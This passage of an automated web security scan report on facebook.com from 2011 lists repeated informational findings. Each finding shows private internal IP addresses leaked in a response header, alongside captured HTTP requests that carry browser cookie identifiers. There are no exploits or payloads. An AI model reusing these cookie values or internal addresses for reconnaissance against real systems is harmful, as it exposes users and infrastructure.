Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fmobile%2F%3Fref%3Dpf; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.124.65
X-Cnection: close
Date: Tue, 19 Jul 2011 14:57:29 GMT
Content-Length: 18096

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;window._script_path = "\/mobile\/index.php";window._EagleEyeSeed="ynVf";</script><
...[SNIP]...

24.223. http://www.facebook.com/pages/create.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /pages/create.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /pages/create.php?ref_type=sitefooter HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc; lsd=xZqF4; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fr.php; campaign_click_url=%2Fcampaign%2Flanding.php%3Fplacement%3Dpflo%26campaign_id%3D402047449186%26extra_1%3Dauto; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fadvertising%2F%3Fcampaign_id%3D402047449186%26placement%3Dpflo%26extra_1%3D0

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: __utma=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmb=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmc=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmz=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpages%2Fcreate.php%3Fref_type%3Dsitefooter; path=/; domain=.facebook.com
Set-Cookie: svid=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.125.46
X-Cnection: close
Date: Tue, 19 Jul 2011 14:58:29 GMT
Content-Length: 32607

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;window._script_path = "\/pages\/create.php";window._EagleEyeSeed="F3jP";</script><
...[SNIP]...

24.224. http://www.facebook.com/plugins/activity.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/activity.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/activity.php?site=www.boston.com&width=311&height=300&header=false&colorscheme=light&font&border_color=white&ref=homepage HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://boston.com/
Cookie: datr=i0EBThVgj6dG_aF4zAL0iwRb

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.147.40
X-Cnection: close
Date: Tue, 19 Jul 2011 20:42:24 GMT
Content-Length: 8776

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;window._script_path = "\/plugins\/activity.php";window._EagleEyeSeed="pbsH";</scri
...[SNIP]...

24.225. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=http://www.boston.com/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7WHDubEEBBYLN/index.html&layout=standard&show_faces=false&width=425&font=arial&colorscheme=light&ref=blogindex HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.boston.com/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7WHDubEEBBYLN/index.html?p1=News_links
Cookie: datr=i0EBThVgj6dG_aF4zAL0iwRb

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.155.33
X-Cnection: close
Date: Tue, 19 Jul 2011 20:44:10 GMT
Content-Length: 25038

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like | Facebook</title><style>body{background:#fff;font-size: 11px
...[SNIP]...

24.226. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=http%3a%2f%2fwww.bing.com%2fvideos%2fwatch%2fabout-bing%2fbing-news%2f1hhlkld1b%3ffrom%3den-us_fblike&locale=en_US&layout=button_count&show_faces=false&width=90&action=like&font=arial&colorscheme=light&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/videos/watch/about-bing/bing-news/1hhlkld1b
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc; campaign_click_url=%2Fcampaign%2Flanding.php%3Fplacement%3Dpflo%26campaign_id%3D402047449186%26extra_1%3Dauto

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.63.23.43
X-Cnection: close
Date: Tue, 19 Jul 2011 15:16:36 GMT
Content-Length: 4236

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like | Facebook</title>
<link type="text/css" rel="stylesheet"
...[SNIP]...

24.227. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?action=recommend&api_key=140669015975185&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df31a2e41bc%26origin%3Dhttp%253A%252F%252Fwww.ticketmaster.com%252Ffc54d770c%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&href=http%3A%2F%2Fo.socl.be%2Fnbl0lg03&layout=standard&locale=en_US&node_type=link&ref=tmus67EventLikeButton-1287641246826c&sdk=joey&show_faces=true&width=300 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.ticketmaster.com/event/000043582C516D43?artistid=736365&majorcatid=10001&minorcatid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc; campaign_click_url=%2Fcampaign%2Flanding.php%3Fplacement%3Dpflo%26campaign_id%3D402047449186%26extra_1%3Dauto

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.79.57
X-Cnection: close
Date: Tue, 19 Jul 2011 18:37:01 GMT
Content-Length: 6945

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like | Facebook</title>
<link type="text/css" rel="stylesheet"
...[SNIP]...

24.228. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?&show_faces=true&action=like&font=arial&layout=standard&colorscheme=light&href=http%3A%2F%2Fwww.bing.com%3Fssd%3D20110719_0700%26ssh%3DS262080510%26FORM%3DHPFBLK%26mkt%3Den-US%26&width=400&height=80 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dnews.yahoo.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fnews.yahoo.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc; _e_FxZX_6=%5B%22FxZX%22%2C1310603126425%2C%22act%22%2C1310603126424%2C7%2C%22cancel%22%2C%22click%22%2C%22click%22%2C%22-%22%2C%22r%22%2C%22%2FBranchOutApp%3Fsk%3Dapp_131479520210618%22%2C%7B%22ft%22%3A%7B%7D%2C%22gt%22%3A%7B%7D%7D%2C717%2C213%2C20%2C1008%2C16%5D

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.86.30
X-Cnection: close
Date: Tue, 19 Jul 2011 14:57:06 GMT
Content-Length: 6328

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like | Facebook</title>
<link type="text/css" rel="stylesheet"
...[SNIP]...

24.229. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.facebook.com%2Fsharethis&send=false&layout=standard&width=450&show_faces=true&action=like&colorscheme=light&font&height=80 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://sharethis.com/account/signin-widget
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dnews.yahoo.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fnews.yahoo.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc; _e_FxZX_6=%5B%22FxZX%22%2C1310603126425%2C%22act%22%2C1310603126424%2C7%2C%22cancel%22%2C%22click%22%2C%22click%22%2C%22-%22%2C%22r%22%2C%22%2FBranchOutApp%3Fsk%3Dapp_131479520210618%22%2C%7B%22ft%22%3A%7B%7D%2C%22gt%22%3A%7B%7D%7D%2C717%2C213%2C20%2C1008%2C16%5D

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.63.29.53
X-Cnection: close
Date: Tue, 19 Jul 2011 14:28:36 GMT
Content-Length: 5906

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like | Facebook</title>
<link type="text/css" rel="stylesheet"
...[SNIP]...

24.230. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?&show_faces=true&action=like&font=arial&layout=standard&colorscheme=light&href=http%3A%2F%2Fwww.bing.com%3Fssd%3D20110719_0700%26ssh%3DS262080510%26FORM%3DHPFBLK%26mkt%3Den-US%26&width=400&height=80 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc; campaign_click_url=%2Fcampaign%2Flanding.php%3Fplacement%3Dpflo%26campaign_id%3D402047449186%26extra_1%3Dauto

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.190.34
X-Cnection: close
Date: Tue, 19 Jul 2011 15:15:25 GMT
Content-Length: 6328

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like | Facebook</title>
<link type="text/css" rel="stylesheet"
...[SNIP]...

24.231. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=http%3a%2f%2fwww.bing.com%2fvideos%2fwatch%2fabout-bing%2fbing-travel%2f1hhlv9sb0%3ffrom%3den-us_fblike&locale=en_US&layout=button_count&show_faces=false&width=90&action=like&font=arial&colorscheme=light&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/videos/watch/video/bing-travel/1hhlv9sb0?from=us&FORM=L8SP87
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc; campaign_click_url=%2Fcampaign%2Flanding.php%3Fplacement%3Dpflo%26campaign_id%3D402047449186%26extra_1%3Dauto

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.63.15.53
X-Cnection: close
Date: Tue, 19 Jul 2011 15:16:41 GMT
Content-Length: 4255

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like | Facebook</title>
<link type="text/css" rel="stylesheet"
...[SNIP]...

24.232. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.facebook.com%2Fsharethis&send=false&layout=standard&width=450&show_faces=true&action=like&colorscheme=light&font&height=80 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://sharethis.com/privacy
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dnews.yahoo.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fnews.yahoo.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc; _e_FxZX_6=%5B%22FxZX%22%2C1310603126425%2C%22act%22%2C1310603126424%2C7%2C%22cancel%22%2C%22click%22%2C%22click%22%2C%22-%22%2C%22r%22%2C%22%2FBranchOutApp%3Fsk%3Dapp_131479520210618%22%2C%7B%22ft%22%3A%7B%7D%2C%22gt%22%3A%7B%7D%7D%2C717%2C213%2C20%2C1008%2C16%5D

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.63.33.45
X-Cnection: close
Date: Tue, 19 Jul 2011 14:28:34 GMT
Content-Length: 5875

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like | Facebook</title>
<link type="text/css" rel="stylesheet"
...[SNIP]...

24.233. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?&show_faces=true&action=like&font=arial&layout=standard&colorscheme=light&href=http%3A%2F%2Fwww.bing.com%3Fssd%3D20110719_0700%26ssh%3DS262080510%26FORM%3DHPFBLK%26mkt%3Den-US%26&width=400&height=80 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc; campaign_click_url=%2Fcampaign%2Flanding.php%3Fplacement%3Dpflo%26campaign_id%3D402047449186%26extra_1%3Dauto

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.115.39
X-Cnection: close
Date: Tue, 19 Jul 2011 23:39:20 GMT
Content-Length: 6331

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like | Facebook</title>
<link type="text/css" rel="stylesheet"
...[SNIP]...

24.234. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?&show_faces=true&action=like&font=arial&layout=standard&colorscheme=light&href=http%3A%2F%2Fwww.bing.com%3Fssd%3D20110719_0700%26ssh%3DS262080510%26FORM%3DHPFBLK%26mkt%3Den-US%26&width=400&height=80 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc; campaign_click_url=%2Fcampaign%2Flanding.php%3Fplacement%3Dpflo%26campaign_id%3D402047449186%26extra_1%3Dauto

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.121.48
X-Cnection: close
Date: Tue, 19 Jul 2011 18:31:15 GMT
Content-Length: 6331

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like | Facebook</title>
<link type="text/css" rel="stylesheet"
...[SNIP]...

24.235. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dff535ced%26origin%3Dhttp%253A%252F%252Fwww.bing.com%252Ff312b68508%26relation%3Dparent.parent%26transport%3Dpostmessage&font=segoe%20ui&href=http%3A%2F%2Fwww.bing.com%2Fcommunity%2Fsite_blogs%2Fb%2Ftravel%2Farchive%2F2011%2F07%2F19%2Fputting-the-fun-in-funiculars.aspx&layout=standard&locale=en_US&node_type=link&sdk=joey&show_faces=true&width=225 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/community/site_blogs/b/travel/archive/2011/07/19/putting-the-fun-in-funiculars.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc; campaign_click_url=%2Fcampaign%2Flanding.php%3Fplacement%3Dpflo%26campaign_id%3D402047449186%26extra_1%3Dauto

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.186.65
X-Cnection: close
Date: Tue, 19 Jul 2011 23:40:15 GMT
Content-Length: 6969

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like | Facebook</title>
<link type="text/css" rel="stylesheet"
...[SNIP]...

24.236. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.facebook.com%2Fsharethis&send=false&layout=standard&width=450&show_faces=true&action=like&colorscheme=light&font&height=80 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://sharethis.com/register
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dnews.yahoo.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fnews.yahoo.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc; _e_FxZX_6=%5B%22FxZX%22%2C1310603126425%2C%22act%22%2C1310603126424%2C7%2C%22cancel%22%2C%22click%22%2C%22click%22%2C%22-%22%2C%22r%22%2C%22%2FBranchOutApp%3Fsk%3Dapp_131479520210618%22%2C%7B%22ft%22%3A%7B%7D%2C%22gt%22%3A%7B%7D%7D%2C717%2C213%2C20%2C1008%2C16%5D

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.63.1.57
X-Cnection: close
Date: Tue, 19 Jul 2011 14:28:42 GMT
Content-Length: 5877

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like | Facebook</title>
<link type="text/css" rel="stylesheet"
...[SNIP]...

24.237. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=http%3a%2f%2fwww.bing.com%2fvideos%2fwatch%2fabout-bing%2fbing-maps%2f1hhryc81i%3ffrom%3den-us_fblike&locale=en_US&layout=button_count&show_faces=false&width=90&action=like&font=arial&colorscheme=light&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/videos/watch/video/bing-maps/1hhryc81i?from=us&FORM=L8SP88
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc; campaign_click_url=%2Fcampaign%2Flanding.php%3Fplacement%3Dpflo%26campaign_id%3D402047449186%26extra_1%3Dauto

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.63.14.60
X-Cnection: close
Date: Tue, 19 Jul 2011 15:16:38 GMT
Content-Length: 4251

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like | Facebook</title>
<link type="text/css" rel="stylesheet"
...[SNIP]...

24.238. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=http%3a%2f%2fwww.bing.com%2fvideos%2fwatch%2fabout-bing%2fbing-maps%2f1hhryc81i%3ffrom%3den-us_fblike&locale=en_US&layout=button_count&show_faces=false&width=90&action=like&font=arial&colorscheme=light&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/videos/watch/video/bing-maps/1hhryc81i?from=us&FORM=L8SP88
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
